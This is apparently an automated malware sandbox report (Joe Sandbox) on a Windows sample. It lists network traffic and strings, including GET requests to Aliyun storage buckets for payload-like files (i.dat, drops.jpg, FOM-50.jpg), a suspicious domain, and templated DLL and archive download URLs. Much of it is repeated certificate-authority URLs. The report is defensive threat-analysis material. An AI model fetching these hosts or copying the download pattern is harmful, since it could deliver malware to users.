
Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: 662hfg.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: cvqthu.net

Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com0_
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sw.symcd.com0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/
Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003q5W;
Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/A5
Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/Y5O;
Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif$
Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifhttps://662hfg.oss-cn-beijing.aliyuncs.com/b.gifhttp
